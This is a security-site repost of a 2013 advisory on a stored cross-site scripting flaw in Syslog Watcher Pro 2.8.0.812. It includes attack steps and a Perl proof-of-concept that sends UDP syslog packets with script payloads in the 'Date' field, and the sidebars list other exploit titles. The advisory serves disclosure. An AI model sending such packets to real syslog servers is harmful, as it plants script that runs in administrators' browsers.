首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Syslog Watcher Pro 2.8.0.812 - (Date Parameter) - Cross Site Scripting Vulnerabi
来源:demonalex(at)163(dot)com 作者:demonalex 发布时间:2013-05-02  

Title: Syslog Watcher Pro 'Date' Parameter Cross Site Scripting Vulnerability
Software : Syslog Watcher Pro

Software Version : v2.8.0.812(Jun 15, 2009)

Vendor: http://www.snmpsoft.com/

Vulnerability Published : 2013-04-27

Vulnerability Update Time :

Status :

Impact : Medium(CVSS2 Base : 6.4, AV:N/AC:L/Au:N/C:P/I:P/A:N)

Bug Description :
Syslog Watcher Pro is a Windows-based syslog server for corporate networks.
Syslog Watcher Pro collects, stores, parses, displays and explains syslog information to both new and professional network administrators.
Syslog Watcher Pro(v2.8.0.812) is vulnerable to XSS by 'Date' Parameter of syslog protocol.

How to Attack :
STEP 1: Send a syslog packet which contained XSS code into 'Date' Parameter to Syslog Watcher Pro.
STEP 2: Syslog Watcher Pro put XSS code into database.
STEP 3: XSS code will be executed after victim generate and view report by Syslog Watcher Pro.

Proof Of Concept :
-----------------------------------------------------------
#!/usr/bin/perl
use IO::Socket::INET;
$|=1;

$host=shift;
$port=shift;

if(defined($host) && defined($port)){
  ;
}else{
  die "usage: $0 host port\n";
}

$con=new IO::Socket::INET->new(PeerPort=>$port,
        Proto=>'udp',
        PeerAddr=>$host);

$npriority = '<0>';
$nhostname = "10.0.0.2";
$npid = 'test[10]';
$nmsg = "testing by demonalex";

$testcase1="<script>alert(\"XSS1\")</script>";
$testcase2="<script>alert(/XSS2/)</script>";

#testcase1
$header = $testcase1.' '.$nhostname.' '.$npid;
$packet = $npriority.$header.': '.$nmsg;
$con->send($packet);

#testcase2
$header = $testcase2.' '.$nhostname.' '.$npid;
$packet = $npriority.$header.': '.$nmsg;
$con->send($packet);

$con->close;

print "Over!\n";

exit(1);
-----------------------------------------------------------

Credits : This vulnerability was discovered by demonalex(at)163(dot)com
mail: demonalex(at)163(dot)com / ChaoYi.Huang@connect.polyu.hk
Independent Researcher
DBAPPSecurity Co.,Ltd./Hong Kong PolyU


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·sudo v1.8.0-1.8.3p1 (sudo_debu
·phpMyAdmin Authenticated Remot
·AudioCover 0.8.18 Buffer Overf
·Wordpress W3 Total Cache PHP C
·Personal File Share HTTP Serve
·Vivotek IP Camera Buffer Overf
·SAP ConfigServlet Remote Code
·Easy Icon Maker Version 5.01 C
·Memcached Remote Denial Of Ser
·DVD X Player 5.5.37 Pro / Stan
·Elecard MPEG Player 5.8 Buffer
·ABBS Audio Media Player v3.1 (
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved